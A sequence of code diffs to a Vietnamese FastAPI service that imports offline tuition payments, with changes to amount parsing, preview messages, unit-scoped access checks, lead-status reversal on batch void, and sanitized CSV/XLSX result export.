+      1. Chỉ lùi khi lead ĐANG ở sts10. Đã chuyển tiếp (nhập học…) → tôn trọng
+         trạng thái hiện tại, KHÔNG kéo lùi pipeline.
+      2. Khôi phục từ LeadStatusHistory GẦN NHẤT đã đẩy lead VÀO sts10 (trường
+         old_*). Không có bản ghi → không biết lùi đâu → bỏ qua + log.
+
+    Caller PHẢI gate: chỉ HK1 + chỉ khi fee KHÔNG còn cleared sau khi đảo tiền.
+
+    Returns True nếu đã lùi, False nếu bỏ qua.
+    """
+    lead = profile.lead
+    if not lead:
+        log.warning(
+            "revert_lead_tuition_paid: Lead not loaded", profile_id=profile.id
+        )
+        return False
+
+    # Guard 1: chỉ lùi khi lead đang ở sts10 (chưa ai chuyển tiếp).
+    if lead.consultation_status_id != TUITION_PAID_STATUS:
+        log.debug(
+            "revert_lead_tuition_paid: lead not at tuition-paid, skip",
+            lead_id=lead.id,
+            current_status=lead.consultation_status_id,
+        )
+        return False
+
+    # Bản ghi forward GẦN NHẤT (→ sts10) → biết status TRƯỚC đó.
+    hist = (
+        await db.execute(
+            select(models.LeadStatusHistory)
+            .where(
+                models.LeadStatusHistory.lead_id == lead.id,
+                models.LeadStatusHistory.new_consultation_status_id
+                == TUITION_PAID_STATUS,
+            )
+            .order_by(models.LeadStatusHistory.id.desc())
+            .limit(1)
+        )
+    ).scalar_one_or_none()
+    if hist is None:
+        log.warning(
+            "revert_lead_tuition_paid: no forward history, skip", lead_id=lead.id
+        )
+        return False
+
+    cur_status = lead.status
+    cur_consult = lead.consultation_status_id
+    cur_stage = lead.pipeline_stage_id
+
+    # Khôi phục giá trị TRƯỚC forward-sync. lead.status NOT NULL → fallback giữ hiện
+    # tại nếu history old_status rỗng (gần như không xảy ra: Lead.status default 'new').
+    lead.consultation_status_id = hist.old_consultation_status_id
+    lead.pipeline_stage_id = hist.old_pipeline_stage_id
+    lead.status = hist.old_status or cur_status
+
+    db.add(
+        models.LeadStatusHistory(
+            lead_id=lead.id,
+            old_status=cur_status,
+            new_status=lead.status,
+            old_consultation_status_id=cur_consult,
+            new_consultation_status_id=lead.consultation_status_id,
+            old_pipeline_stage_id=cur_stage,
+            new_pipeline_stage_id=lead.pipeline_stage_id,
+            changed_by_user_id=changed_by_user_id,
+            reason=reason or "Đảo ghi nhận học phí (void lô import)",
+        )
+    )
+    await db.flush()
+
+    log.info(
+        "revert_lead_tuition_paid: lead reverted from tuition-paid",
+        lead_id=lead.id,
+        profile_id=profile.id,
+        to_consultation_status=lead.consultation_status_id,
+    )
     return True
 
 

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -1663,7 +1663,7 @@ async def build_result_file(
         label = _result_status_label(batch.status, r.status)
         pay = ", ".join(str(p) for p in (r.payment_ids or []))
         written = (
-            str(r.amount)
+            f"{r.amount:.0f}"  # VND nguyên — bỏ đuôi '.00' của Numeric(15,2)
             if (
                 batch.status == committed_v
                 and r.status in written_statuses

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -1272,7 +1272,12 @@ async def commit_batch(
             total_amount += row_total
             if row_cleared:
                 cleared_profiles[row_cleared[0]] = row_cleared[1]
-        except (BusinessRuleViolation, ResourceNotFoundError, ValueError) as exc:
+        except (
+            BusinessRuleViolation,
+            ResourceNotFoundError,
+            ValueError,
+            ConflictError,
+        ) as exc:
             # Lỗi nghiệp vụ/giá trị → message đã sạch (tiếng Việt) → hiện thẳng cho kế toán.
             failed_count += 1
             row.status = PaymentImportRowStatusEnum.error.value
@@ -1282,7 +1287,7 @@ async def commit_batch(
             # message generic + LOG đầy đủ cho dev. Savepoint per-row đã rollback dòng này
             # nên các dòng khác vẫn ghi (cũng làm lô ROBUST: lỗi-lạ 1 dòng không abort cả lô).
             log.error(
-                "bulk import commit: lỗi không lường khi ghi dòng",
+                "bulk_commit_row_unexpected_error",
                 batch_id=batch_id,
                 row_no=row.row_no,
                 error=str(exc),
@@ -1652,7 +1657,8 @@ def _result_status_label(batch_status: str, row_status: str) -> str:
     return "Dự kiến ghi"  # preview
 
 
-COL_PROFILE_NAME = "Tên hồ sơ"  # tên hệ thống (Lead.full_name) — đối chiếu file
+# "(hệ thống)" trong nhãn để tránh trùng nếu file có sẵn cột tên "Tên hồ sơ".
+COL_PROFILE_NAME = "Tên hồ sơ (hệ thống)"  # tên hệ thống (Lead.full_name)
 _RESULT_EXTRA_COLS = ["Trạng thái", "Lý do", "Mã Payment", "Đã ghi (đồng)"]
 
 

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -192,8 +192,10 @@ def parse_amount_vn(raw: str) -> Decimal:
     """Parse số tiền kiểu VN. '.' = phân cách nghìn, ',' = thập phân.
 
     "7.200.000" -> 7200000 · "7.200.000,50" -> 7200000.50 · "7200000.0" (float
-    string từ Excel, nhóm cuối 1 chữ số) -> 7200000. Heuristic: '.' với nhóm cuối
-    đúng 3 chữ số = phân cách nghìn; nếu không -> thập phân.
+    string từ Excel, nhóm cuối 1 chữ số) -> 7200000. Heuristic: dấu phân cách ĐƠN
+    ('.' hoặc ',') với nhóm cuối ĐÚNG 3 chữ số = phân cách nghìn ("500.000" và
+    "500,000" đều = 500000 vì VND nguyên); nhóm cuối 1-2 chữ số = thập phân
+    ("7,50" -> 7.50). Nhiều dấu = phân cách nghìn (US "7,200,000").
     """
     # Bỏ MỌI khoảng trắng kể cả NBSP   / narrow   — file ngân hàng/Excel
     # hay ghi '7 200 000' với non-breaking space (re \s khớp Unicode whitespace).
@@ -213,7 +215,12 @@ def parse_amount_vn(raw: str) -> Decimal:
         if s.count(",") > 1:  # nhiều ',' = phân cách nghìn (US 7,200,000)
             _check_thousands_groups(s.split(","), raw)
             s = s.replace(",", "")
-        else:  # 1 dấu ',' = thập phân VN (7,50)
+        elif len(s.rsplit(",", 1)[1]) == 3:  # 1 ',' + nhóm cuối 3 số -> nghìn
+            # Đối xứng nhánh '.': VND nguyên nên '500,000' = 500000, KHÔNG phải thập
+            # phân 500,000 -> 500.00 (P1: ghi nhầm 500đ thay vì 500.000đ).
+            _check_thousands_groups(s.split(","), raw)
+            s = s.replace(",", "")
+        else:  # 1 ',' + nhóm cuối 1-2 số = thập phân VN (7,50 -> 7.50)
             s = s.replace(",", ".")
     elif has_dot:  # '.' nhập nhằng
         if len(s.rsplit(".", 1)[1]) == 3:  # nhóm cuối 3 chữ số -> nghìn

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -1392,8 +1392,11 @@ async def void_batch(
     (router get_db không commit). Lock TẤT CẢ invoice (asc id) RỒI fee (asc id) —
     khớp lock-order invoice→fee, tránh deadlock ABBA với verify/commit đồng thời.
 
-    ⚠️ KHÔNG tự đảo lead-status (sts10→cũ): projection 1 chiều, không lưu status cũ
-    → điều chỉnh lead thủ công nếu cần (void là thao tác kế toán hiếm).
+    Lead-status: void TỰ lùi lead khỏi sts10 ("Đã hoàn tất học phí") về status TRƯỚC
+    (đối xứng forward sync) cho hồ sơ HK1 KHÔNG còn cleared sau đảo — qua
+    ``revert_lead_tuition_paid`` (đọc LeadStatusHistory). Best-effort: chỉ khi lead
+    ĐANG ở sts10 (đã chuyển tiếp/nhập học → giữ nguyên, không kéo lùi). KHÔNG đẩy
+    sts18 (đó là refund THẬT — ``sync_lead_tuition_refunded``).
     """
     from app.services.payment_service import reverse_payment_balances
 
@@ -1542,6 +1545,13 @@ async def void_batch(
         )
         reversed_count += 1
         reversed_amount += p.amount
+
+    # ⚠️ Flush việc đảo tiền xuống DB TRƯỚC vòng lùi-lead. autoflush=False (database.py)
+    # → các UPDATE/INSERT đảo tiền ở trên còn PENDING; nếu không flush ở đây, lần flush
+    # ĐẦU TIÊN là `db.flush()` BÊN TRONG savepoint của revert → revert lỗi → ROLLBACK TO
+    # SAVEPOINT cuốn theo cả đảo tiền (mất tiền đã đảo dù lô vẫn chuyển 'void'). Flush
+    # NGOÀI savepoint = đảo tiền bền trong outer txn; revert lỗi chỉ mất projection.
+    await db.flush()
 
     # Lùi lead (projection) cho hồ sơ HK1 KHÔNG còn cleared sau khi đảo tiền — đối xứng
     # forward sync ở commit. Void = SỬA NHẦM ghi nhận (KHÔNG phải học sinh rút) → lùi về

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -55,7 +55,7 @@ from app.models.finance import (
     TransactionTypeEnum,
 )
 from app.repositories.fee_repository import FeeRepository, InvoiceRepository
-from app.utils.csv_helpers import sanitize_csv_cell
+from app.utils.csv_helpers import sanitize_csv_row
 from app.utils.exceptions import (
     BadRequest,
     BusinessRuleViolation,
@@ -1009,6 +1009,23 @@ class CommitResult:
     total_amount: Decimal  # tổng tiền đã ghi
 
 
+async def _assert_batch_creator_in_unit(
+    db: AsyncSession, batch: PaymentImportBatch, unit_id: Optional[int]
+) -> None:
+    """IDOR unit-scope theo ĐƠN VỊ người tạo lô: manager (unit_id!=None) chỉ thao tác lô
+    do user CÙNG đơn vị tạo; admin/accountant (unit_id=None) → mọi lô. Ngoài scope → 404
+    (không lộ tồn tại). 1 NGUỒN quy tắc dùng chung commit/void/detail (tránh drift quyền)."""
+    if unit_id is None:
+        return
+    creator_unit = (
+        await db.execute(
+            select(models.User.unit_id).where(models.User.id == batch.created_by_id)
+        )
+    ).scalar_one_or_none()
+    if creator_unit != unit_id:
+        raise ResourceNotFoundError("Không tìm thấy lô import")
+
+
 async def commit_batch(
     db: AsyncSession,
     *,
@@ -1038,17 +1055,8 @@ async def commit_batch(
     ).scalar_one_or_none()
     if batch is None:
         raise ResourceNotFoundError("Không tìm thấy lô import")
-    # P1 IDOR: committer unit-scope (manager) chỉ commit lô do user CÙNG ĐƠN VỊ tạo;
-    # admin/accountant (unit_id=None) → commit mọi lô. Chặn manager commit/poison lô
-    # đơn vị khác → 404 (không lộ tồn tại).
-    if unit_id is not None:
-        creator_unit = (
-            await db.execute(
-                select(models.User.unit_id).where(models.User.id == batch.created_by_id)
-            )
-        ).scalar_one_or_none()
-        if creator_unit != unit_id:
-            raise ResourceNotFoundError("Không tìm thấy lô import")
+    # P1 IDOR: committer unit-scope — chặn manager commit/poison lô đơn vị khác.
+    await _assert_batch_creator_in_unit(db, batch, unit_id)
     if batch.status != PaymentImportBatchStatusEnum.preview.value:
         raise ConflictError(
             f"Lô #{batch_id} không ở trạng thái preview (hiện: {batch.status})"
@@ -1357,18 +1365,8 @@ async def void_batch(
     ).scalar_one_or_none()
     if batch is None:
         raise ResourceNotFoundError("Không tìm thấy lô import")
-    # IDOR: void unit-scope theo đơn vị NGƯỜI TẠO (khớp commit/list). manager unit-
-    # scope; admin (unit_id=None) → mọi lô. accountant bị Casbin chặn (void=mgr/admin).
-    if unit_id is not None:
-        creator_unit = (
-            await db.execute(
-                select(models.User.unit_id).where(
-                    models.User.id == batch.created_by_id
-                )
-            )
-        ).scalar_one_or_none()
-        if creator_unit != unit_id:
-            raise ResourceNotFoundError("Không tìm thấy lô import")
+    # IDOR: void unit-scope theo đơn vị NGƯỜI TẠO (accountant đã bị Casbin chặn).
+    await _assert_batch_creator_in_unit(db, batch, unit_id)
     if batch.status != PaymentImportBatchStatusEnum.committed.value:
         raise ConflictError(
             f"Chỉ đảo (void) được lô đã committed (hiện: {batch.status})"
@@ -1600,16 +1598,7 @@ async def get_batch_detail_scoped(
     batch, rows = await load_batch_with_rows(db, batch_id)
     if batch is None:
         raise ResourceNotFoundError("Không tìm thấy lô import")
-    if unit_id is not None:
-        creator_unit = (
-            await db.execute(
-                select(models.User.unit_id).where(
-                    models.User.id == batch.created_by_id
-                )
-            )
-        ).scalar_one_or_none()
-        if creator_unit != unit_id:
-            raise ResourceNotFoundError("Không tìm thấy lô import")
+    await _assert_batch_creator_in_unit(db, batch, unit_id)
     return batch, rows
 
 
@@ -1672,13 +1661,13 @@ async def build_result_file(
             else ""
         )
         cells = [raw.get(k, "") for k in raw_keys] + [label, r.message or "", pay, written]
-        return [sanitize_csv_cell(c) for c in cells]
+        return sanitize_csv_row(cells)  # = [sanitize_csv_cell(c) for c in cells]
 
     fname = f"ket_qua_import_lo_{batch_id}"
     if (fmt or "").lower() == "csv":
         buf = io.StringIO()
         writer = csv.writer(buf)
-        writer.writerow([sanitize_csv_cell(h) for h in header])
+        writer.writerow(sanitize_csv_row(header))
         for r in rows:
             writer.writerow(_row_cells(r))
         content = ("﻿" + buf.getvalue()).encode("utf-8")  # BOM
@@ -1689,7 +1678,7 @@ async def build_result_file(
     wb = Workbook()
     ws = wb.active
     ws.title = "Ket qua"
-    ws.append([sanitize_csv_cell(h) for h in header])
+    ws.append(sanitize_csv_row(header))
     for r in rows:
         ws.append(_row_cells(r))
     # Force TEXT mọi ô (chống injection + giữ số 0 đầu CCCD).

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -1543,6 +1543,42 @@ async def void_batch(
         reversed_count += 1
         reversed_amount += p.amount
 
+    # Lùi lead (projection) cho hồ sơ HK1 KHÔNG còn cleared sau khi đảo tiền — đối xứng
+    # forward sync ở commit. Void = SỬA NHẦM ghi nhận (KHÔNG phải học sinh rút) → lùi về
+    # status TRƯỚC sts10, KHÔNG đẩy sts18 (đó là refund thật). Bọc savepoint + try/except
+    # MỖI hồ-sơ: lỗi projection KHÔNG hủy đảo tiền của cả lô (tiền đã đảo phải giữ).
+    from app.services.fee_calculation_service import is_hk1_cleared
+    from app.services.lead_admission_sync import revert_lead_tuition_paid
+
+    reverted_leads = 0
+    for fee in fee_by_id.values():
+        if fee.fee_type != "tuition" or fee.semester_no != 1:
+            continue  # chỉ HK1 đụng pipeline lead
+        if is_hk1_cleared(fee.fee_type, fee.semester_no, fee.status, fee.paid_amount):
+            continue  # HK1 vẫn còn cleared (nguồn thu khác) → giữ lead ở sts10
+        try:
+            async with db.begin_nested():
+                profile = await _load_profile_with_lead(db, fee.admission_profile_id)
+                if profile is not None and await revert_lead_tuition_paid(
+                    db=db,
+                    profile=profile,
+                    changed_by_user_id=user_id,
+                    reason=f"Đảo (void) lô import #{batch_id}",
+                ):
+                    reverted_leads += 1
+        except Exception as exc:  # noqa: BLE001
+            log.error(
+                "bulk_void_lead_revert_failed",
+                batch_id=batch_id,
+                profile_id=fee.admission_profile_id,
+                error=str(exc),
+                exc_info=True,
+            )
+    if reverted_leads:
+        log.info(
+            "bulk_void_leads_reverted", batch_id=batch_id, count=reverted_leads
+        )
+
     batch.status = PaymentImportBatchStatusEnum.void.value
     batch.voided_at = now
     batch.void_reason = (reason or "")[:1000]

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -398,7 +398,9 @@ async def resolve_and_validate(
     }
     profiles = await _fetch_profiles(db, cccds, academic_year, unit_id)
     fees = await _fetch_tuition_fees(db, [p.id for p in profiles.values()], semester_no)
-    invoices_by_fee = await _fetch_payable_invoices(db, [f.id for f in fees.values()])
+    fee_ids = [f.id for f in fees.values()]
+    invoices_by_fee = await _fetch_payable_invoices(db, fee_ids)
+    invoice_statuses = await _fetch_invoice_status_sets(db, fee_ids)
 
     # G2 — code hình thức ĐANG hoạt động (mirror commit:1017). Parser đã loại method
     # text lạ (:346); đây bắt method map-OK nhưng PaymentMethod inactive/missing → ERROR
@@ -479,7 +481,16 @@ async def resolve_and_validate(
         warnings: List[str] = []
         invoices = invoices_by_fee.get(fee.id, [])
         if not invoices:
-            res.message = "chưa phát hành hóa đơn (đợt còn nháp) hoặc đã thu đủ"
+            # Tách rõ hành động cho kế toán (thay vì gộp 'nháp hoặc đã thu đủ').
+            # Ưu tiên 'nháp' khi vừa có đợt nháp vừa có đợt đã thu đủ — vì còn việc
+            # phải làm: phát hành đợt nháp để thu tiếp.
+            statuses = invoice_statuses.get(fee.id, set())
+            if InvoiceStatusEnum.draft.value in statuses:
+                res.message = "đợt còn nháp — kế toán cần phát hành hóa đơn trước"
+            elif InvoiceStatusEnum.paid.value in statuses:
+                res.message = "học phí đã thu đủ"
+            else:
+                res.message = "chưa có đợt hóa đơn để thu"
             results.append(res)
             continue
 
@@ -657,6 +668,22 @@ async def _fetch_payable_invoices(
     for inv in (await db.execute(stmt)).scalars().all():
         by_fee.setdefault(inv.fee_id, []).append(inv)
     return by_fee
+
+
+async def _fetch_invoice_status_sets(
+    db: AsyncSession,
+    fee_ids: List[int],
+) -> Dict[int, set]:
+    """Lô fee_id → {fee_id: set(status MỌI invoice)} (1 query). Phân biệt nhánh
+    KHÔNG-payable: đợt còn nháp (draft → cần phát hành) vs đã thu đủ (paid) vs chưa
+    có đợt → message preview rõ hành động thay vì gộp 'nháp hoặc đã thu đủ'."""
+    if not fee_ids:
+        return {}
+    stmt = select(Invoice.fee_id, Invoice.status).where(Invoice.fee_id.in_(fee_ids))
+    out: Dict[int, set] = {}
+    for fee_id, status in (await db.execute(stmt)).all():
+        out.setdefault(fee_id, set()).add(status)
+    return out
 
 
 def _money(v: Decimal) -> str:

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -459,8 +459,8 @@ async def resolve_and_validate(
             res.message = "CCCD phải đúng 12 chữ số" if d.citizen_id else "thiếu CCCD"
             results.append(res)
             continue
-        # (G2) hình thức đã map (parser) nhưng PaymentMethod inactive/missing → ERROR sớm
-        # (commit:1017 cũng chặn → tránh "khớp giả" ở preview).
+        # (G2) hình thức đã map (parser) nhưng PaymentMethod inactive/missing → ERROR
+        # sớm (commit:1017 cũng chặn → tránh "khớp giả" ở preview).
         if d.method_code not in active_methods:
             res.message = "hình thức chưa được kích hoạt trong hệ thống"
             results.append(res)
@@ -538,8 +538,9 @@ async def resolve_and_validate(
                 f"ngày thu {d.payment_date:%d/%m/%Y} lệch xa năm học {academic_year}"
             )
 
-        # (G1) CCCD xuất hiện nhiều dòng trong file → cảnh báo (không chặn). Nhấn mạnh khi
-        # CÙNG số tiền (nghi copy nhầm → thu khống), vì chốt "không vượt nợ" không bắt được.
+        # (G1) CCCD xuất hiện nhiều dòng trong file → cảnh báo (không chặn). Nhấn
+        # mạnh khi CÙNG số tiền (nghi copy nhầm → thu khống), vì chốt "không vượt
+        # nợ" không bắt được.
         dup_n = cccd_counts.get(d.citizen_id, 0)
         if dup_n > 1:
             if cccd_amount_counts.get((d.citizen_id, d.amount), 0) > 1:
@@ -1048,7 +1049,8 @@ async def _assert_batch_creator_in_unit(
 ) -> None:
     """IDOR unit-scope theo ĐƠN VỊ người tạo lô: manager (unit_id!=None) chỉ thao tác lô
     do user CÙNG đơn vị tạo; admin/accountant (unit_id=None) → mọi lô. Ngoài scope → 404
-    (không lộ tồn tại). 1 NGUỒN quy tắc dùng chung commit/void/detail (tránh drift quyền)."""
+    (không lộ tồn tại). 1 NGUỒN quy tắc dùng chung commit/void/detail (tránh drift
+    quyền)."""
     if unit_id is None:
         return
     creator_unit = (
@@ -1285,14 +1287,16 @@ async def commit_batch(
             ValueError,
             ConflictError,
         ) as exc:
-            # Lỗi nghiệp vụ/giá trị → message đã sạch (tiếng Việt) → hiện thẳng cho kế toán.
+            # Lỗi nghiệp vụ/giá trị → message đã sạch (tiếng Việt) → hiện thẳng cho
+            # kế toán.
             failed_count += 1
             row.status = PaymentImportRowStatusEnum.error.value
             row.message = str(exc)[:500]
-        except Exception as exc:  # noqa: BLE001 — lỗi KHÔNG lường (DB/FK/IntegrityError…)
-            # KHÔNG nhét dump SQLAlchemy/asyncpg cho kế toán (xấu + lộ chi tiết kỹ thuật) →
-            # message generic + LOG đầy đủ cho dev. Savepoint per-row đã rollback dòng này
-            # nên các dòng khác vẫn ghi (cũng làm lô ROBUST: lỗi-lạ 1 dòng không abort cả lô).
+        except Exception as exc:  # noqa: BLE001 — lỗi KHÔNG lường (DB/IntegrityError)
+            # KHÔNG nhét dump SQLAlchemy/asyncpg cho kế toán (xấu + lộ chi tiết kỹ
+            # thuật) → message generic + LOG đầy đủ cho dev. Savepoint per-row đã
+            # rollback dòng này nên các dòng khác vẫn ghi (lô ROBUST: lỗi-lạ 1 dòng
+            # không abort cả lô).
             log.error(
                 "bulk_commit_row_unexpected_error",
                 batch_id=batch_id,
@@ -1560,10 +1564,10 @@ async def void_batch(
     # NGOÀI savepoint = đảo tiền bền trong outer txn; revert lỗi chỉ mất projection.
     await db.flush()
 
-    # Lùi lead (projection) cho hồ sơ HK1 KHÔNG còn cleared sau khi đảo tiền — đối xứng
-    # forward sync ở commit. Void = SỬA NHẦM ghi nhận (KHÔNG phải học sinh rút) → lùi về
-    # status TRƯỚC sts10, KHÔNG đẩy sts18 (đó là refund thật). Bọc savepoint + try/except
-    # MỖI hồ-sơ: lỗi projection KHÔNG hủy đảo tiền của cả lô (tiền đã đảo phải giữ).
+    # Lùi lead (projection) cho hồ sơ HK1 KHÔNG còn cleared sau khi đảo tiền — đối
+    # xứng forward sync ở commit. Void = SỬA NHẦM ghi nhận (KHÔNG phải học sinh rút)
+    # → lùi về status TRƯỚC sts10, KHÔNG đẩy sts18 (đó là refund thật). Bọc savepoint
+    # + try/except MỖI hồ-sơ: lỗi projection KHÔNG hủy đảo tiền cả lô (tiền đã đảo giữ).
     from app.services.fee_calculation_service import is_hk1_cleared
     from app.services.lead_admission_sync import revert_lead_tuition_paid
 
@@ -1697,7 +1701,8 @@ async def get_batch_detail_scoped(
 
 
 def _result_status_label(batch_status: str, row_status: str) -> str:
-    """Nhãn Trạng thái cho file kết quả — theo LÔ × DÒNG (P2: void KHÔNG "Thành công")."""
+    """Nhãn Trạng thái cho file kết quả — theo LÔ × DÒNG (P2: void KHÔNG "Thành
+    công")."""
     if row_status == PaymentImportRowStatusEnum.error.value:
         if batch_status == PaymentImportBatchStatusEnum.committed.value:
             return "Lỗi (không ghi)"
@@ -1722,8 +1727,8 @@ async def build_result_file(
     → ``(content, media_type, filename)``. IDOR scope.
 
     🔴 P1 chống formula injection: MỌI ô (raw = user nhập + header cột do file quyết) qua
-    ``sanitize_csv_cell`` (CSV + XLSX); XLSX thêm ``number_format='@'`` (text) phòng openpyxl
-    diễn giải chuỗi mở đầu '=' thành công thức.
+    ``sanitize_csv_cell`` (CSV + XLSX); XLSX thêm ``number_format='@'`` (text) phòng
+    openpyxl diễn giải chuỗi mở đầu '=' thành công thức.
     """
     batch, rows = await get_batch_detail_scoped(db, batch_id, unit_id)
     committed_v = PaymentImportBatchStatusEnum.committed.value

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -1,0 +1,403 @@
+# app/services/payment_import_service.py
+"""
+Payment Import Service (BV-2) - parse + resolve/validate (READ-ONLY preview).
+
+Kế toán thu offline → import file mẫu → hệ thống đối chiếu từng dòng theo CCCD,
+phân bổ FIFO (chỉ GỐC học phí) và phân loại MATCHED / WARNING / ERROR. BV-2 KHÔNG
+ghi Payment — chỉ đọc + tính + (tùy chọn) lưu batch 'preview' để xem trước.
+
+Ref: Documents/BULK_PAYMENT_IMPORT_VERIFY_PLAN.md (DESIGN v2). 7 điểm bắt buộc:
+1. đọc dtype=str CCCD/ref/amount · 2. method 'bank_transfer' · 3. fee active-only
+· 4. FIFO principal-first · 5. chống double-alloc trong batch · 6. IDOR + CCCD lỗi
+sạch · 7. resolve read-only thuần.
+"""
+import hashlib
+import io
+import re
+import unicodedata
+from dataclasses import dataclass, field
+from datetime import date, datetime, timezone
+from decimal import Decimal, InvalidOperation
+from typing import Dict, List, Optional
+
+import pandas as pd
+import structlog
+from sqlalchemy import select
+from sqlalchemy.ext.asyncio import AsyncSession
+
+from app import models
+from app.models.finance import (
+    Fee, Invoice, PaymentMethod, FeeStatusEnum,
+    InvoiceStatusEnum, PAYABLE_INVOICE_STATUSES,
+    PaymentImportBatch, PaymentImportRow,
+    PaymentImportBatchStatusEnum, PaymentImportRowStatusEnum,
+)
+from app.utils.csv_helpers import sanitize_csv_cell
+from app.utils.exceptions import BadRequest
+
+log = structlog.get_logger(__name__)
+
+# ---------------------------------------------------------------------------
+# Template columns (tiếng Việt — chốt 06-24) + mapping
+# ---------------------------------------------------------------------------
+COL_CCCD = "Số CCCD"
+COL_NAME = "Họ và tên học sinh"
+COL_AMOUNT = "Số tiền thu (VNĐ)"
+COL_DATE = "Ngày thu"
+COL_METHOD = "Hình thức"
+COL_REF = "Mã tham chiếu"
+COL_NOTE = "Ghi chú"
+
+REQUIRED_COLS = [COL_CCCD, COL_AMOUNT, COL_DATE, COL_METHOD]
+TEMPLATE_COLS = [COL_CCCD, COL_NAME, COL_AMOUNT, COL_DATE, COL_METHOD, COL_REF, COL_NOTE]
+
+# Hình thức → PaymentMethod.code thực (seed fin20260131002): cash / bank_transfer.
+METHOD_MAP = {
+    "tiền mặt": "cash", "tien mat": "cash", "tm": "cash", "cash": "cash",
+    "chuyển khoản": "bank_transfer", "chuyen khoan": "bank_transfer",
+    "ck": "bank_transfer", "bank_transfer": "bank_transfer",
+}
+
+CCCD_RE = re.compile(r"^\d{12}$")
+MAX_IMPORT_ROWS = 5000
+
+
+# ---------------------------------------------------------------------------
+# Result types
+# ---------------------------------------------------------------------------
+@dataclass
+class RowDraft:
+    """Một dòng file đã parse (chưa resolve)."""
+    row_no: int
+    citizen_id: str
+    name: str
+    amount: Optional[Decimal]
+    payment_date: Optional[date]
+    method_code: Optional[str]
+    reference: str
+    note: str
+    raw: dict
+    parse_error: Optional[str] = None
+
+
+@dataclass
+class Allocation:
+    """Một phần phân bổ vào 1 invoice (đợt)."""
+    invoice_id: int
+    installment_no: int
+    amount: Decimal
+
+
+@dataclass
+class RowResult:
+    row_no: int
+    status: str                       # matched | warned | error
+    message: Optional[str] = None
+    citizen_id: Optional[str] = None
+    profile_id: Optional[int] = None
+    fee_id: Optional[int] = None
+    amount: Optional[Decimal] = None
+    method_code: Optional[str] = None
+    payment_date: Optional[date] = None
+    reference: Optional[str] = None
+    allocations: List[Allocation] = field(default_factory=list)
+    raw: dict = field(default_factory=dict)
+
+
+@dataclass
+class PreviewResult:
+    rows: List[RowResult]
+    matched_count: int
+    warned_count: int
+    failed_count: int
+    total_amount: Decimal
+
+
+# ---------------------------------------------------------------------------
+# Parse helpers
+# ---------------------------------------------------------------------------
+def _norm(s: Optional[str]) -> str:
+    return (s or "").strip()
+
+
+def _norm_name(s: Optional[str]) -> str:
+    """Bỏ dấu + lower + gộp khoảng trắng để cross-check tên."""
+    s = unicodedata.normalize("NFD", _norm(s))
+    s = "".join(c for c in s if unicodedata.category(c) != "Mn")
+    return " ".join(s.lower().split())
+
+
+def parse_amount_vn(raw: str) -> Decimal:
+    """Parse số tiền kiểu VN. '.' = phân cách nghìn, ',' = thập phân.
+
+    "7.200.000" -> 7200000 · "7.200.000,50" -> 7200000.50 · "7200000.0" (float
+    string từ Excel, nhóm cuối 1 chữ số) -> 7200000. Heuristic: '.' với nhóm cuối
+    đúng 3 chữ số = phân cách nghìn; nếu không -> thập phân.
+    """
+    s = _norm(raw).replace(" ", "").replace(" ", "")
+    if not s:
+        raise ValueError("trống")
+    if "," in s:                                  # ',' = thập phân VN
+        s = s.replace(".", "").replace(",", ".")
+    elif "." in s:                                # '.' nhập nhằng
+        if len(s.rsplit(".", 1)[1]) == 3:         # nhóm cuối 3 chữ số -> nghìn
+            s = s.replace(".", "")
+        # else: '.' là thập phân (float string) -> giữ nguyên
+    try:
+        val = Decimal(s)
+    except InvalidOperation:
+        raise ValueError(f"số tiền không hợp lệ: '{raw}'")
+    if val <= 0:
+        raise ValueError("số tiền phải > 0")
+    return val
+
+
+def parse_date_vn(raw: str) -> date:
+    """dd/mm/yyyy (hoặc dd-mm-yyyy)."""
+    s = _norm(raw)
+    for fmt in ("%d/%m/%Y", "%d-%m-%Y", "%Y-%m-%d"):
+        try:
+            return datetime.strptime(s, fmt).date()
+        except ValueError:
+            continue
+    raise ValueError(f"ngày không hợp lệ (cần dd/mm/yyyy): '{raw}'")
+
+
+def file_sha256(content: bytes) -> str:
+    return hashlib.sha256(content).hexdigest()
+
+
+def parse_template(content: bytes, filename: str) -> List[RowDraft]:
+    """Đọc file mẫu → list RowDraft. CCCD/ref/amount đọc **dtype=str** (giữ số 0
+    đầu / không float). Lỗi từng dòng ghi vào ``parse_error`` (không raise)."""
+    ext = (filename.rsplit(".", 1)[-1] or "").lower()
+    if ext not in ("csv", "xlsx"):
+        raise BadRequest("Chỉ hỗ trợ file .xlsx hoặc .csv")
+    if not content:
+        raise BadRequest("File rỗng")
+    try:
+        if ext == "csv":
+            df = pd.read_csv(io.BytesIO(content), dtype=str)
+        else:
+            df = pd.read_excel(io.BytesIO(content), engine="openpyxl", dtype=str)
+    except Exception as exc:  # noqa: BLE001
+        raise BadRequest(f"Không đọc được file: {exc}")
+
+    df = df.fillna("")
+    missing = [c for c in REQUIRED_COLS if c not in df.columns]
+    if missing:
+        raise BadRequest(f"File thiếu cột bắt buộc: {', '.join(missing)}")
+
+    if len(df) > MAX_IMPORT_ROWS:
+        raise BadRequest(
+            f"File {len(df)} dòng vượt giới hạn {MAX_IMPORT_ROWS} dòng/lần import.")
+
+    drafts: List[RowDraft] = []
+    for i, row in df.iterrows():
+        row_no = int(i) + 1
+        raw = {c: sanitize_csv_cell(row.get(c, "")) for c in df.columns}
+        cccd = _norm(str(row.get(COL_CCCD, "")))
+        name = _norm(str(row.get(COL_NAME, "")))
+        ref = _norm(str(row.get(COL_REF, "")))
+        note = _norm(str(row.get(COL_NOTE, "")))
+
+        err = None
+        amount = None
+        try:
